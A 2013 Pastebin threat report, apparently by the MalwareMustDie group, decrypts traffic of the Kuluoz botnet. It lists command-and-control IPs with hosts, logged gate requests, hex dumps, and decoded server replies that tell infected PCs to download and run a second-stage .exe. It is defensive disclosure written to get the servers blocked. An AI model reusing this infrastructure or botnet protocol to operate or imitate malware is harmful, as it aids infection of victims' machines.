SHARE
TWEET

#MalwareMustDie! Kuluoz #Botnet CnC Unleashed (#Tango )

MalwareMustDie Jul 4th, 2013 1,149 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. // #MalwareMustDie!!
  2. // @unixfreaxjp /malware]$ date
  3. // Fri Jul  5 00:19:58 JST 2013
  4. // ----------------------------
  5. // Kuluoz botnet communications sniffed TODAY at the below requests from infection PC:
  6. // During the decryption found
  7.    - the second payload request (updates)
  8.    - Kuluoz botnet private botnet networking
  9.    - CnC data.
  10.  
  11. // Today's Requested IP:PROXY form the infected Kuluoz PCs are:
  12.  
  13. 178.208.35.190:8080
  14. 186.112.214.158:8080
  15. 95.140.42.27:8080
  16. 203.146.208.180:8090
  17. 202.29.229.232:8080
  18. 77.92.140.241:8080
  19.  
  20. // Locations...
  21.  
  22. 178.208.35.190  NL Greup, Netherlands       51.7862, 4.4377  Combell Group Nv Combell Group Nv combell.com
  23. 186.112.214.158 CO Bogota D.C., Colombia,   4.6492, -74.0628 Colombia Telecomunicaciones S.A. Esp Telecomunicaciones S.A. Esp  
  24. 95.140.42.27    HU Hungary, Europe        47,      20      Szervernet Ltd. Szervernet Ltd.  
  25. 203.146.208.180 TH Bangkok, Thailand, Asia  13.754, 100.5014 Loxley Information Company Ltd. CS LoxInfo  
  26. 202.29.229.232  TH Thailand, Asia           15,     100      UniNet(Inter-university network) Unspecified Uninet-th  
  27. 77.92.140.241   TR Sanayi, Antalya, Turkey, 36.9031,30.6991  Hosting Internet Hizmetleri Sanayi ve Ticaret Anon Hosting Internet Hizmetleri Sanayi ve Ticaret Anon sadecehosting.net
  28.  
  29. // We are recording all requests as per below and decrypting the first three IP
  30. // for the shutdown purpose
  31.  
  32. log.txt(31): h00p://203.146.208.180:8090/cxErZ1nDF6A7F10CFB0D822BD6A442451FF7F6C13E44C2E57D87B6E3C4FDA5455DC4011C16648B6036867F2B52C6BF8443D7533EBD2144838C95B4F4482BC08D5B4EDD1C4691FB5D63
  33. log.txt(35): h00p://203.146.208.180:8090/nXFB1CY2D5D2B54A46DA4A63C19398EBEB87C65335ED99145D0CEE49C0217FEFC14537B77AEA61BAA54E88C5EBE8F33BB77218FDB11EB56E0711183A3905A12F33E664D73D09D4ACB5
  34. log.txt(39): h00p://203.146.208.180:8090/CIov24rb5B9F5B4763E27016CD035F7FCDCA75C17EE2437510D5673C1BBD04E514A2F8BCF78EE618D59427B9C1D64C7702F56E7A69CF90AC733C015B07DAC382622AD5CEC22B72F5
  35. log.txt(43): h00p://203.146.208.180:8090/lzPiZZrB235F17B5B261B27A0B483BFCF8FC269CCED21019300F53F8CC2B001AB9C42EAE0F18215FEE292F4F6DDB8090A2EE580697AE14C58321394303890C37B16EC60456E974209D
  36. log.txt(47): h00p://203.146.208.180:8090/YpITvFiK1C9DD8C10860C4EF8AA5F367A003B2DF0129E09E9BD9A6A28B09C9248D9F44173A6FEFBBA539C5A5781B529C1433B229B8706B589FC9442439BC5F6F10F0B5130B34B82244
  37. log.txt(51): h00p://202.29.229.232:8080/EQqpctxY81BBEBAB855D656245D292F4450405BF3E5F9DA980BBAA1FE39850A5C1EB435EF5684CD7B340C1F196455C2DE68F9DEBBD41DEEED2FED66B450CAD1C02E178E68992FB2EF5
  38. log.txt(56): h00p://178.208.35.190:8080/9A4cfSPd994616860C0D9882494F7EDF4AB098644431D0549A1B0A0011DFEEF4BA360F49376697385C600F92A740674C6051F2DE786376D235BAD61A0B932C3F5D7412FBDE036393AB
  39. log.txt(61): h00p://178.208.35.190:8080/9A4cfSPd994616860C0D9882494F7EDF4AB098644438DE55D34B3B471ED0CED0F8790C066152D3660A046EC7
  40. log.txt(84): h00p://95.140.42.27:8080/WvvUBQ610EC76E893E8D01859561D313435808245F1ED6F2078FEB3E6D78D5050CB189D770B7E66D7B57073F9F6BC6C4A3113A53C8EA8A147B1D261B9AB5D85616CF8371C55C773487
  41. log.txt(96): h00p://95.140.42.27:8080/Yki83XNuEC0BE99C56D912EC410C5E3A11885312593832807508530DCAA6F5DB3D9A902B14B324B66B5B80656E4E60AE09BBF92475FFF25887E3F2FC1F7FD8B5B451E622CAF747F69C
  42. log.txt(101): h00p://95.140.42.27:8080/pjuR8A3eFC05C3D6062AB6DBF00A15A2B1389FAE53CADA146201712150B54E732C57336FEA8CC7A085C0D8963E732FC563557FCF5BD589B67162E97054706912876624996AE68DB8
  43. log.txt(106): h00p://95.140.42.27:8080/tJcKoBSsEDE95904DB7FA2B3EFA8124C03C088C58D1910B95E39D149B6A34BFD842DF390C5A03DAC33929DAE
  44. log.txt(140): h00p://186.112.214.158:8080/L2ZynNQhCABAA843114F2B108A1AA560C7234B4E68D1601E9EF77D90C75275B75E62DAE5EC9B2AB4B545AAC02F808CCF19AD2574E0E6DD53D653D7AE53618586299C84AA89C74AD16F
  45. log.txt(144): h00p://186.112.214.158:8080/dWguhErv004DE435B7C67DB5F8B98F4B6187D6CD771F89A31173BBDE27DED967C13A9606E7EA2872B66E03A40F394FE29EEE6B9B59FDC3E1B31BC60EF0EDD795356D008FE5BD4D6F88
  46. log.txt(148): h00p://186.112.214.158:8080/lpcvWowk243A89131B397A6CC392CA8725FC67F01F51ABA24B842F6FD4C012F50CB5A9FE73C9CECAEDF5C6893C390FF9E55D118AA0EC7855F5DAADCFA6869393BBE189DC62B3B80CE8
  47. log.txt(152): h00p://186.112.214.158:8080/lpcvWowk243A89131B397A6CC392CA8725FC67F01F58A5A302812F7FCEFE0EF641FAAAB170CCDD818AAD80D3
  48. log.txt(175): h00p://186.112.214.158:8080/oU9HTVxTEC2C2A72BFBB8455F713402CB0874EC7BE9A5DB58E36C391E9D0CB9E579040C3894BCF121DDF6BC9
  49.  
  50. // Decryption Report
  51.  
  52. ===============================
  53. 178.208.35.190  NL Greup, Netherlands
  54. ===============================
  55.  
  56. // Kuluoz HTTP Botnet Requests sent are:
  57.  
  58. http://178.208.35.190:8080/9A4cfSPd994616860C0D9882494F7EDF4AB098644431D0549A1B0A0011DFEEF4BA360F49376697385C600F92A740674C6051F2DE786376D235BAD61A0B932C3F5D7412FBDE036393AB
  59.  // decrypted →/index.php?r=gate&id=9A4cfSPd&group=0711rcm&debug=0&ips=192.168.0.128
  60.   // response:    c=run&u=/get/e0e989581b9ab693e0424fe419a17399.exe&crc=8e2275d02cfbbddf623f60394bb71926
  61.   // 2nd payload: /get/e0e989581b9ab693e0424fe419a17399.exe
  62.  
  63. http://178.208.35.190:8080/9A4cfSPd994616860C0D9882494F7EDF4AB098644438DE55D34B3B471ED0CED0F8790C066152D3660A046EC7
  64.  // decrypted →/index.php?r=gate/getipslist&id=9A4cfSPd
  65.   // response:
  66.  
  67. 0000   87 1B 41 CC 5B 44 86 DC 10 0C 71 83 46 EF C3 29    ..A.[D....q.F..)
  68. 0010   18 24 B3 09 92 0C 7A 00 42 97 89 96 F0 22 5F 01    .$....z.B...."_.
  69. 0020   60 23 DF 35 66 66 06 95 FB 12 3B 58 2A 06 A1 9F    `#.5ff....;X*...
  70. 0030   31 6F 73 CC 66 F2 95 1F 0A A0 29 26 42 7B 18 FB    1os.f.....)&B{..
  71. 0040   DF 19 62 8F A1 D3 0D E4 01 E0 69 6D D6 BE 29 BB    ..b.......im..).
  72. 0050   3F F7 3B 88 82 31 47 A1 2B A7 84 19 CE E8 E2 76    ?.;..1G.+......v
  73. 0060   7E AE 30 CB 79 AD 74 2C F7 43 5E EB BC 90 1A 7B    ~.0.y.t,.C^....{
  74. 0070   83 16 94 7F 87                                     .....
  75.  
  76. // response decrypted, and the data are the CNC lists of this session's Kuluoz...
  77.  
  78. 149.210.130.18:993
  79. 95.140.42.27:8080.
  80. 186.112.214.158:8080.
  81. 77.92.140.241:8080.
  82. 202.29.229.232:8080.
  83. 178.208.35.190:8080.
  84.  
  85. ===============================
  86. 95.140.42.27 Szervernet Hungary
  87. ===============================
  88.  
  89. // Kuluoz HTTP Botnet Requests sent are:
  90.  
  91. http://95.140.42.27:8080/WvvUBQ610EC76E893E8D01859561D313435808245F1ED6F2078FEB3E6D78D5050CB189D770B7E66D7B57073F9F6BC6C4A3113A53C8EA8A147B1D261B9AB5D85616CF8371C55C773487
  92.  
  93.    // decrypted (RAW):
  94.       2f 69 6e 64 65 78 2e 70 68 70 3f 72 3d 67 61 74  /index.php?r=gat
  95.       65 26 69 64 3d 57 76 76 55 42 51 36 31 26 67 72  e&id=WvvUBQ61&gr
  96.       6f 75 70 3d 30 37 31 31 72 63 6d 26 64 65 62 75  oup=0711rcm&debu
  97.       67 3d 30 26 69 70 73 3d 31 39 32 2e 31 36 38 2e  g=0&ips=192.168.
  98.       30 2e 31 33 37                                   0.137          
  99.  
  100.  // decrypted → /index.php?r=gate&id=WvvUBQ61&group=0711rcm&debug=0&ips=192.168.0.137
  101.   // response (2nd payload): c=run&u=/get/e0e989581b9ab693e0424fe419a17399.exe&crc=733b75728281f1afbe32f725aecf0991
  102.  
  103. http://95.140.42.27:8080/Yki83XNuEC0BE99C56D912EC410C5E3A11885312593832807508530DCAA6F5DB3D9A902B14B324B66B5B80656E4E60AE09BBF92475FFF25887E3F2FC1F7FD8B5B451E622CAF747F69C
  104.  
  105.  // decrypted → /index.php?r=gate&id=Yki83XNu&group=0711rcm&debug=0&ips=192.168.0.128
  106.   // response (2nd payload): c=run&u=/get/e0e989581b9ab693e0424fe419a17399.exe&crc=733b75728281f1afbe32f725aecf0991
  107.  
  108. http://95.140.42.27:8080/pjuR8A3eFC05C3D6062AB6DBF00A15A2B1389FAE53CADA146201712150B54E732C57336FEA8CC7A085C0D8963E732FC563557FCF5BD589B67162E97054706912876624996AE68DB8
  109.  
  110.  // decrypted → /index.php?r=gate&id=pjuR8A3e&group=3006rcm&debug=0&ips=192.168.0.58
  111.   // response (2nd payload): c=run&u=/get/e0e989581b9ab693e0424fe419a17399.exe&crc=733b75728281f1afbe32f725aecf0991
  112.  
  113. http://95.140.42.27:8080/tJcKoBSsEDE95904DB7FA2B3EFA8124C03C088C58D1910B95E39D149B6A34BFD842DF390C5A03DAC33929DAE
  114.  
  115.    // response (RAW):
  116.       0000   F3 B4 0E 4E 8C 36 BC ED B6 EB 1D 10 0F 9F D3 88    ...N.6..........
  117.       0010   D1 05 7D E5 1F 7E 90 0E EA E4 0C BB 8C 76 A0 97    ..}..~.......v..
  118.       0020   89 DA 66 D7 56 E1 F6 EB 69 96 24 47 4E 51 E3 AF    ..f.V...i.$GNQ..
  119.       0030   4D 74 C5 EE 03 6D 2C D0 9A 8E D2 39 8E 55 69 63    Mt...m,....9.Uic
  120.       0040   5D 85 F7 69 E3 D5 50 3A 84 A7 72 72 D8 8B 0A 39    ]..i..P:..rr...9
  121.       0050   2C 1B 76 30 51 BA 6F 4F 13 10 D2 D9 3E 2F 4A 81    ,.v0Q.oO....>/J.
  122.       0060   F6 91 A8 2D 0C 99 C0 71 06 D3 E6 BD E1 07 89 F4    ...-...q........
  123.       0070   19 99 2C F0 C4 51 B2 C8 D6 55 01 5E 3A 13 CB 92    ..,..Q...U.^:...
  124.       0080   8E E0 1F 1A 1D 58 A5                               .....X.
  125.  
  126.    // decrypted (RAW):
  127.  
  128.       31 34 39 2e 32 31 30 2e 31 33 30 2e 31 38 3a 39   149.210.130.18:9
  129.       39 33 0a 39 35 2e 31 34 30 2e 34 32 2e 32 37 3a   93.95.140.42.27:
  130.       38 30 38 30 0a 31 38 36 2e 31 31 32 2e 32 31 34   8080.186.112.214
  131.       2e 31 35 38 3a 38 30 38 30 0a 37 37 2e 39 32 2e   .158:8080.77.92.
  132.       31 34 30 2e 32 34 31 3a 38 30 38 30 0a 32 30 32   140.241:8080.202
  133.       2e 32 39 2e 32 32 39 2e 32 33 32 3a 38 30 38 30   .29.229.232:8080
  134.       0a 31 37 38 2e 32 30 38 2e 33 35 2e 31 39 30 3a   .178.208.35.190:
  135.       38 30 38 30 0a 36 32 2e 31 31 33 2e 32 30 30 2e   8080.62.113.200.
  136.       39 35 3a 39 39 33 0a                              95:993.        
  137.                        
  138.   // decrypted response shows CnC:data....
  139.      149.210.130.18:993
  140.      95.140.42.27:8080
  141.      186.112.214.158:8080
  142.      77.92.140.241:8080
  143.      202.29.229.232:8080
  144.      178.208.35.190:8080
  145.      62.113.200.95:993.        
  146.  
  147. ===================================================
  148. 186.112.214.158 ColombiaTel Bogota D.C., Colombia
  149. ===================================================
  150.  
  151. // Kuluoz HTTP Botnet Requests sent are:
  152.  
  153. http://186.112.214.158:8080/L2ZynNQhCABAA843114F2B108A1AA560C7234B4E68D1601E9EF77D90C75275B75E62DAE5EC9B2AB4B545AAC02F808CCF19AD2574E0E6DD53D653D7AE53618586299C84AA89C74AD16F
  154.  // decrypted → /index.php?r=gate&id=L2ZynNQh&group=0711rcm&debug=0&ips=192.168.0.128
  155.   // response (2nd payload): c=run&u=/get/e0e989581b9ab693e0424fe419a17399.exe&crc=cbca008e4bc329beb3567020a8d54512
  156.  
  157. http://186.112.214.158:8080/dWguhErv004DE435B7C67DB5F8B98F4B6187D6CD771F89A31173BBDE27DED967C13A9606E7EA2872B66E03A40F394FE29EEE6B9B59FDC3E1B31BC60EF0EDD795356D008FE5BD4D6F88
  158.  // decrypted → /index.php?r=gate&id=dWguhErv&group=0711rcm&debug=0&ips=192.168.0.128
  159.   // response (2nd payload): c=run&u=/get/e0e989581b9ab693e0424fe419a17399.exe&crc=cbca008e4bc329beb3567020a8d54512
  160.  
  161. http://186.112.214.158:8080/lpcvWowk243A89131B397A6CC392CA8725FC67F01F51ABA24B842F6FD4C012F50CB5A9FE73C9CECAEDF5C6893C390FF9E55D118AA0EC7855F5DAADCFA6869393BBE189DC62B3B80CE8
  162.  // decrypted → /index.php?r=gate&id=lpcvWowk&group=0711rcm&debug=0&ips=192.168.0.133
  163.   // response (2nd payload): c=run&u=/get/e0e989581b9ab693e0424fe419a17399.exe&crc=cbca008e4bc329beb3567020a8d54512
  164.  
  165. http://186.112.214.158:8080/lpcvWowk243A89131B397A6CC392CA8725FC67F01F58A5A302812F7FCEFE0EF641FAAAB170CCDD818AAD80D3
  166.  // decrypted → /index.php?r=gate/getipslist&id=lpcvWowk
  167.   // response:
  168.   0000   3A 67 DE 59 4C 70 64 32 9A D1 C5 DB 29 A3 3C BD    :g.YLpd2....).<.
  169.   0010   43 44 C8 FF 43 C6 6E 38 92 B9 49 B0 49 A1 F9 B6    CD..C.n8..I.I...
  170.   0020   24 8C 86 C7 D7 F3 CF 8E 60 6B 53 ED AF 0A 42 CB    $.......`kS...B.
  171.   0030   E9 E0 7D 4B A6 92 EE CA A7 B5 96 8A A4 EE 83 DC    ..}K............
  172.   0040   63 A9 B9 11 E9 59 7C 3A 2F EA 6A F3 AB A5 1B 28    c....Y|:/.j....(
  173.   0050   EC D1 9F 05 E4 5A D9 23 CA 5F 33 32 F2 CB A2 A0    .....Z.#._32....
  174.   0060   29 45 4B BF 8E 0C 49 2D 6A 72 32 E5 AB EF 26 30    )EK...I-jr2...&0
  175.   0070   77 82 62 45 C4 84 F6 98 C5 2D C9 B7 14 2E 86 5A    w.bE.....-.....Z
  176.   0080   8F F7 EB 57 7F F5 28                               ...W..(
  177.  
  178.   // decrypted response shows CnC:data....
  179.   149.210.130.18:993
  180.   95.140.42.27:8080
  181.   186.112.214.158:8080
  182.   77.92.140.241:8080
  183.   202.29.229.232:8080
  184.   178.208.35.190:8080
  185.   62.113.200.95:993.
  186.  
  187.  
  188. http://186.112.214.158:8080/oU9HTVxTEC2C2A72BFBB8455F713402CB0874EC7BE9A5DB58E36C391E9D0CB9E579040C3894BCF121DDF6BC9
  189.  // decrypted → /index.php?r=gate/getipslist&id=oU9HTVxT
  190.  
  191.   // response:
  192.   0000   F2 71 7D 38 E8 F2 9A 0B AE 50 4F 70 BC D8 15 8A    .q}8.....POp....
  193.   0010   E2 86 30 E9 CF 71 82 D6 B5 97 8C D8 5F CB 13 C4    ..0..q......_...
  194.   0020   DE 2E CE 6A 43 B8 2B AB BD 24 D1 EA 17 B5 4A E4    ...jC.+..$....J.
  195.   0030   D1 73 3C 40 EA 7A 87 D4 25 3C 8C BB 36 DB FB B1    .s<@.z..%<..6...
  196.   0040   C1 0D 23 A5 55 BF 2A EF 95 F3 AD ED F0 11 5D 26    ..#.U.*.......]&
  197.   0050   01 C6 14 7B 4F 8A DA 55 69 4C 73 2B DF B8 6B 53    ...{O..UiLs+..kS
  198.   0060   5F 5F 44 7D BA 2C F1 83 EC 0F F5 38 D6 B8 53 00    __D}.,.....8..S.
  199.   0070   BC BF B2 94 9B 8B E9 80 A8 30 BE 0A 4C 9B 53 96    .........0..L.S.
  200.   0080   33 6C 5A 00 46 6B D8                               3lZ.Fk.
  201.  
  202.   // decrypted response shows CnC:data....
  203.   149.210.130.18:993
  204.   95.140.42.27:8080
  205.   186.112.214.158:8080
  206.   77.92.140.241:8080
  207.   202.29.229.232:8080
  208.   178.208.35.190:8080
  209.   62.113.200.95:993.
  210.  
  211.  
  212. // Verdicted as per evidence above,
  213. // Please help to shutdown or block these malicous traffic.
  214.  
  215. ---
  216. #MalwareMustDie!!!
RAW Paste Data
Challenge yourself this year...
Learn something new in 2017
Top